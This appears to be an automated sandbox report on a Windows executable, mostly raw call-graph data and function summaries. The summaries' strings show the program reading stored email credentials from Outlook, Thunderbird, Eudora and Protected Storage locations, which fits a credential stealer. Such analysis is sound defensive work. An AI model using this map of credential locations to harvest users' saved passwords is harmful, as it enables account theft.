4107fc FreeLibrary 33697->33699 33698->33477 33699->33698 33701 404785 FreeLibrary 33700->33701 33702 40473b LoadLibraryA 33701->33702 33703 40474c GetProcAddress 33702->33703 33704 40476e 33702->33704 33703->33704 33705 404764 33703->33705 33706 404781 33704->33706 33707 404785 FreeLibrary 33704->33707 33705->33704 33706->33477 33707->33706 33708->33479 33710 4036fb 33709->33710 33713 4037c5 33709->33713 33909 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33710->33909 33712 40370e 33712->33713 33714 403716 strchr 33712->33714 33713->33634 33714->33713 33715 403730 33714->33715 33910 4021b6 memset 33715->33910 33717 40373f _mbscpy _mbscpy strlen 33718 4037a4 _mbscpy 33717->33718 33719 403789 sprintf 33717->33719 33911 4023e5 16 API calls 33718->33911 33719->33718 33722 4085e2 33721->33722 33912 4082cd 11 API calls 33722->33912 33726 408600 33727 403cba 33726->33727 33728 40860b memset 33726->33728 33739 40821d 33727->33739 33915 410b62 RegEnumKeyExA 33728->33915 33730 408637 33731 4086d2 RegCloseKey 33730->33731 33733 40865c memset 33730->33733 33916 410a9c RegOpenKeyExA 33730->33916 33919 410b62 RegEnumKeyExA 33730->33919 33731->33727 33917 410add RegQueryValueExA 33733->33917 33736 408694 33918 40848b 10 API calls 33736->33918 33738 4086ab RegCloseKey 33738->33730 33920 410a9c RegOpenKeyExA 33739->33920 33741 40823f 33742 403cc6 33741->33742 33743 408246 memset 33741->33743 33751 4086e0 33742->33751 33921 410b62 RegEnumKeyExA 33743->33921 33745 4082bf RegCloseKey 33745->33742 33747 40826f 33747->33745 33922 410a9c RegOpenKeyExA 33747->33922 33923 4080ed 11 API calls 33747->33923 33924 410b62 RegEnumKeyExA 33747->33924 33750 4082a2 RegCloseKey 33750->33747 33925 4045db 33751->33925 33756 408737 wcslen 33757 4088ef 33756->33757 33763 40876a 33756->33763 33933 404656 33757->33933 33758 40877a wcsncmp 33758->33763 33760 404734 3 API calls 33760->33763 33761 404785 FreeLibrary 33761->33763 33762 408812 memset 33762->33763 33764 40883c memcpy wcschr 33762->33764 33763->33757 33763->33758 33763->33760 33763->33761 33763->33762 33763->33764 33765 4088c3 LocalFree 33763->33765 33936 40466b _mbscpy 33763->33936 33764->33763 33765->33763 33766 410a9c RegOpenKeyExA 33766->33647 33767->33651 33937 410a9c RegOpenKeyExA 33768->33937 33770 402c7a 33771 402da5 33770->33771 33772 402c87 memset 33770->33772 33771->33656 33938 410b62 RegEnumKeyExA 33772->33938 33774 402d9c RegCloseKey 33774->33771 33775 410b1e 3 API calls 33776 402ce4 memset sprintf 33775->33776 33939 410a9c RegOpenKeyExA 33776->33939 33778 402d28 33779 402d3a sprintf 33778->33779 33940 402bd1 40 API calls 33778->33940 33941 410a9c RegOpenKeyExA 33779->33941 33782 402cb2 33782->33774 33782->33775 33785 402d9a 33782->33785 33942 402bd1 40 API calls 33782->33942 33943 410b62 RegEnumKeyExA 33782->33943 33785->33774 33786->33659 33787->33663 33788->33667 33790 410816 33789->33790 33791 4107f1 FreeLibrary 33790->33791 33792 403ddd 33791->33792 33792->33672 33944 410a9c RegOpenKeyExA 33793->33944 33795 402ff9 33796 403006 memset 33795->33796 33797 40312c 33795->33797 33945 410b62 RegEnumKeyExA 33796->33945 33797->33676 33799 403122 RegCloseKey 33799->33797 33800 410b1e 3 API calls 33801 403058 memset sprintf 33800->33801 33946 410a9c RegOpenKeyExA 33801->33946 33803 403033 33803->33799 33803->33800 33804 4030a2 memset 33803->33804 33805 410b62 RegEnumKeyExA 33803->33805 33807 4030f9 RegCloseKey 33803->33807 33948 402db3 26 API calls 33803->33948 33947 410b62 RegEnumKeyExA 33804->33947 33805->33803 33807->33803 33810 4032d5 33809->33810 33811 4033a9 33809->33811 33949 4021b6 memset 33810->33949 33824 4034e4 memset memset 33811->33824 33813 4032e1 33950 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33813->33950 33815 4032ea 33816 4032f8 memset GetPrivateProfileSectionA 33815->33816 33951 4023e5 16 API calls 33815->33951 33816->33811 33821 40332f 33816->33821 33818 40339b strlen 33818->33811 33818->33821 33820 403350 strchr 33820->33821 33821->33811 33821->33818 33952 4021b6 memset 33821->33952 33953 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33821->33953 33954 4023e5 16 API calls 33821->33954 33825 410b1e 3 API calls 33824->33825 33826 40353f 33825->33826 33827 40357f 33826->33827 33828 403546 _mbscpy 33826->33828 33832 403985 33827->33832 33955 406d55 strlen _mbscat 33828->33955 33830 403565 _mbscat 33956 4033f0 19 API calls 33830->33956 33957 40466b _mbscpy 33832->33957 33836 4039aa 33837 4039ff 33836->33837 33958 40f460 memset memset 33836->33958 33979 40f6e2 33836->33979 33995 4038e8 21 API calls 33836->33995 33839 404785 FreeLibrary 33837->33839 33840 403a0b 33839->33840 33841 4037ca memset memset 33840->33841 34003 444551 memset 33841->34003 33844 4038e2 33844->33686 33907 40f334 334 API calls 33844->33907 33846 40382e 33847 406f06 2 API calls 33846->33847 33848 403843 33847->33848 33849 406f06 2 API calls 33848->33849 33850 403855 strchr 33849->33850 33851 403884 _mbscpy 33850->33851 33852 403897 strlen 33850->33852 33853 4038bf _mbscpy 33851->33853 33852->33853 33854 4038a4 sprintf 33852->33854 34015 4023e5 16 API calls 33853->34015 33854->33853 33857 44b090 33856->33857 33858 40fb10 RegOpenKeyExA 33857->33858 33859 403e7f 33858->33859 33860 40fb3b RegOpenKeyExA 33858->33860 33870 40f96c 33859->33870 33861 40fb55 RegQueryValueExA 33860->33861 33862 40fc2d RegCloseKey 33860->33862 33863 40fc23 RegCloseKey 33861->33863 33864 40fb84 33861->33864 33862->33859 33863->33862 33865 404734 3 API calls 33864->33865 33866 40fb91 33865->33866 33866->33863 33867 40fc19 LocalFree 33866->33867 33868 40fbdd memcpy memcpy 33866->33868 33867->33863 34020 40f802 11 API calls 33868->34020 33871 4070ae GetVersionExA 33870->33871 33872 40f98d 33871->33872 33873 4045db 7 API calls 33872->33873 33881 40f9a9 33873->33881 33874 40fae6 33875 404656 FreeLibrary 33874->33875 33876 403e85 33875->33876 33882 4442ea memset 33876->33882 33877 40fa13 memset WideCharToMultiByte 33878 40fa43 _strnicmp 33877->33878 33877->33881 33879 40fa5b WideCharToMultiByte 33878->33879 33878->33881 33880 40fa88 WideCharToMultiByte 33879->33880 33879->33881 33880->33881 33881->33874 33881->33877 33883 410dbb 9 API calls 33882->33883 33884 444329 33883->33884 34021 40759e strlen strlen 33884->34021 33889 410dbb 9 API calls 33890 444350 33889->33890 33891 40759e 3 API calls 33890->33891 33892 44435a 33891->33892 33893 444212 65 API calls 33892->33893 33894 444366 memset memset 33893->33894 33895 410b1e 3 API calls 33894->33895 33896 4443b9 ExpandEnvironmentStringsA strlen 33895->33896 33897 4443f4 _strcmpi 33896->33897 33898 4443e5 33896->33898 33899 403e91 33897->33899 33900 44440c 33897->33900 33898->33897 33899->33477 33901 444212 65 API calls 33900->33901 33901->33899 33902->33648 33903->33652 33904->33660 33905->33664 33906->33668 33907->33686 33908->33688 33909->33712 33910->33717 33911->33713 33913 40841c 33912->33913 33914 410a9c RegOpenKeyExA 33913->33914 33914->33726 33915->33730 33916->33730 33917->33736 33918->33738 33919->33730 33920->33741 33921->33747 33922->33747 33923->33750 33924->33747 33926 404656 FreeLibrary 33925->33926 33927 4045e3 LoadLibraryA 33926->33927 33928 404651 33927->33928 33929 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33927->33929 33928->33756 33928->33757 33930 40463d 33929->33930 33931 404643 33930->33931 33932 404656 FreeLibrary 33930->33932 33931->33928 33932->33928 33934 403cd2 33933->33934 33935 40465c FreeLibrary 33933->33935 33934->33766 33935->33934 33936->33763 33937->33770 33938->33782 33939->33778 33940->33779 33941->33782 33942->33782 33943->33782 33944->33795 33945->33803 33946->33803 33947->33803 33948->33803 33949->33813 33950->33815 33951->33816 33952->33820 33953->33821 33954->33821 33955->33830 33956->33827 33957->33836 33996 4078ba 33958->33996 33961 4078ba _mbsnbcat 33962 40f5a3 RegOpenKeyExA 33961->33962 33963 40f5c3 RegQueryValueExA 33962->33963 33964 40f6d9 33962->33964 33965 40f6d0 RegCloseKey 33963->33965 33966 40f5f0 33963->33966 33964->33836 33965->33964 33966->33965 33967 40f675 33966->33967 34000 40466b _mbscpy 33966->34000 33967->33965 34001 4012ee strlen 33967->34001 33969 40f611 33971 404734 3 API calls 33969->33971 33976 40f616 33971->33976 33972 40f69e RegQueryValueExA 33972->33965 33973 40f6c1 33972->33973 33973->33965 33974 40f66a 33975 404785 FreeLibrary 33974->33975 33975->33967 33976->33974 33977 40f661 LocalFree 33976->33977 33978 40f645 memcpy 33976->33978 33977->33974 33978->33977 34002 40466b _mbscpy 33979->34002 33981 40f6fa 33982 4045db 7 API calls 33981->33982 33983 40f708 33982->33983 33984 40f7e2 33983->33984 33985 404734 3 API calls 33983->33985 33986 404656 FreeLibrary 33984->33986 33990 40f715 33985->33990 33987 40f7f1 33986->33987 33988 404785 FreeLibrary 33987->33988 33989 40f7fc 33988->33989 33989->33836 33990->33984 33991 40f797 WideCharToMultiByte 33990->33991 33992 40f7b8 strlen 33991->33992 33993 40f7d9 LocalFree 33991->33993 33992->33993 33994 40f7c8 _mbscpy 33992->33994 33993->33984 33994->33993 33995->33836 33997 4078e6 33996->33997 33998 4078c7 _mbsnbcat 33997->33998 33999 4078ea 33997->33999 33998->33997 33999->33961 34000->33969 34001->33972 34002->33981 34016 410a9c RegOpenKeyExA 34003->34016 34005 44458b 34006 40381a 34005->34006 34017 410add RegQueryValueExA 34005->34017 34006->33844 34014 4021b6 memset 34006->34014 34008 4445dc RegCloseKey 34008->34006 34009 4445a4 34009->34008 34018 410add RegQueryValueExA 34009->34018 34011 4445c1 34011->34008 34019 444879 30 API calls 34011->34019 34013 4445da 34013->34008 34014->33846 34015->33844 34016->34005 34017->34009 34018->34011 34019->34013 34020->33867 34022 4075c9 34021->34022 34023 4075bb _mbscat 34021->34023 34024 444212 34022->34024 34023->34022 34041 407e9d 34024->34041 34027 44424d 34028 444274 34027->34028 34029 444258 34027->34029 34049 407ef8 34027->34049 34030 407e9d 9 API calls 34028->34030 34062 444196 52 API calls 34029->34062 34037 4442a0 34030->34037 34032 407ef8 9 API calls 34032->34037 34033 4442ce 34059 407f90 34033->34059 34037->34032 34037->34033 34039 444212 65 API calls 34037->34039 34063 407e62 strcmp strcmp 34037->34063 34038 407f90 FindClose 34040 4442e4 34038->34040 34039->34037 34040->33889 34042 407f90 FindClose 34041->34042 34043 407eaa 34042->34043 34044 406f06 2 API calls 34043->34044 34045 407ebd strlen strlen 34044->34045 34046 407ee1 34045->34046 34047 407eea 34045->34047 34064 4070e3 strlen _mbscat _mbscpy _mbscat 34046->34064 34047->34027 34050 407f03 FindFirstFileA 34049->34050 34051 407f24 FindNextFileA 34049->34051 34052 407f3f 34050->34052 34053 407f46 strlen strlen 34051->34053 34054 407f3a 34051->34054 34052->34053 34056 407f7f 34052->34056 34053->34056 34057 407f76 34053->34057 34055 407f90 FindClose 34054->34055 34055->34052 34056->34027 34065 4070e3 strlen _mbscat _mbscpy _mbscat 34057->34065 34060 407fa3 34059->34060 34061 407f99 FindClose 34059->34061 34060->34038 34061->34060 34062->34027 34063->34037 34064->34047 34065->34056 34066->33491 34067->33495 34068->33502 34069->33501 34070->33508 34071->33505 34072->33500 34417 43ffc8 18 API calls 34231 4281cc 15 API calls __fprintf_l 34419 4383cc 110 API calls __fprintf_l 34232 4275d3 41 API calls 34420 4153d3 22 API calls __fprintf_l 34233 444dd7 _XcptFilter 34425 4013de 15 API calls 34427 425115 111 API calls __fprintf_l 34428 43f7db 18 API calls 34431 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34235 4335ee 16 API calls __fprintf_l 34433 429fef 11 API calls 34236 444deb _exit _c_exit 34434 40bbf0 138 API calls 34239 425115 79 API calls __fprintf_l 34438 437ffa 22 API calls 34243 4021ff 14 API calls 34244 43f5fc 149 API calls 34439 40e381 9 API calls 34246 405983 40 API calls 34247 42b186 27 API calls __fprintf_l 34248 427d86 76 API calls 34249 403585 20 API calls 34251 42e58e 18 API calls __fprintf_l 34254 425115 75 API calls __fprintf_l 34256 401592 8 API calls 33159 410b92 33162 410a6b 33159->33162 33161 410bb2 33163 410a77 33162->33163 33164 410a89 GetPrivateProfileIntA 33162->33164 33167 410983 memset _itoa WritePrivateProfileStringA 33163->33167 33164->33161 33166 410a84 33166->33161 33167->33166 34443 434395 16 API calls 34258 441d9c memcmp 34445 43f79b 119 API calls 34259 40c599 43 API calls 34446 426741 87 API calls 34263 4401a6 21 API calls 34265 426da6 memcpy memset memset memcpy 34266 4335a5 15 API calls 34268 4299ab memset memset memcpy memset memset 34269 40b1ab 8 API calls 34451 425115 76 API calls __fprintf_l 34455 4113b2 18 API calls 2 library calls 34459 40a3b8 memset sprintf SendMessageA 34073 410bbc 34076 4109cf 34073->34076 34077 4109dc 34076->34077 34078 410a23 memset GetPrivateProfileStringA 34077->34078 34079 4109ea memset 34077->34079 34084 407646 strlen 34078->34084 34089 4075cd sprintf memcpy 34079->34089 34082 410a0c WritePrivateProfileStringA 34083 410a65 34082->34083 34085 40765a 34084->34085 34086 40765c 34084->34086 34085->34083 34088 4076a3 34086->34088 34090 40737c strtoul 34086->34090 34088->34083 34089->34082 34090->34086 34271 40b5bf memset memset _mbsicmp

                                                                                                              Executed Functions

                                                                                                              Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040832F
                                                                                                              • memset.MSVCRT ref: 00408343
                                                                                                              • memset.MSVCRT ref: 0040835F
                                                                                                              • memset.MSVCRT ref: 00408376
                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                              • strlen.MSVCRT ref: 004083E9
                                                                                                              • strlen.MSVCRT ref: 004083F8
                                                                                                              • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                              • String ID: 5$H$O$b$i$}$}
                                                                                                              • API String ID: 1832431107-3760989150
                                                                                                              • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                              • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                              Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                              • strlen.MSVCRT ref: 00407F5C
                                                                                                              • strlen.MSVCRT ref: 00407F64
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFindstrlen$FirstNext
                                                                                                              • String ID: ACD
                                                                                                              • API String ID: 379999529-620537770
                                                                                                              • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                              • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                              • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                              • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                              Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00401E8B
                                                                                                              • strlen.MSVCRT ref: 00401EA4
                                                                                                              • strlen.MSVCRT ref: 00401EB2
                                                                                                              • strlen.MSVCRT ref: 00401EF8
                                                                                                              • strlen.MSVCRT ref: 00401F06
                                                                                                              • memset.MSVCRT ref: 00401FB1
                                                                                                              • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                              • memset.MSVCRT ref: 00402003
                                                                                                              • sprintf.MSVCRT ref: 00402030
                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                              • memset.MSVCRT ref: 00402086
                                                                                                              • memset.MSVCRT ref: 0040209B
                                                                                                              • strlen.MSVCRT ref: 004020A1
                                                                                                              • strlen.MSVCRT ref: 004020AF
                                                                                                              • strlen.MSVCRT ref: 004020E2
                                                                                                              • strlen.MSVCRT ref: 004020F0
                                                                                                              • memset.MSVCRT ref: 00402018
                                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                              • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                              • API String ID: 1846531875-4223776976
                                                                                                              • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                              • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                              Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,771B0A60,?,00000000,?,?,?,0040CF60,771B0A60), ref: 00404AB8
                                                                                                                • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,771B0A60), ref: 00404ADE
                                                                                                                • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                              • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                              • API String ID: 745651260-375988210
                                                                                                              • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                              • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                              • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                              • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                              Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                              Strings
                                                                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                                                                              • pstorec.dll, xrefs: 00403C30
                                                                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                              • API String ID: 1197458902-317895162
                                                                                                              • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                              • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                              • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                              • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                              Function 0044B49F Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 118COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                              • String ID: h4ND$k{v
                                                                                                              • API String ID: 3662548030-3410959870
                                                                                                              • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                              • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                              • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                              • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C
                                                                                                              Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
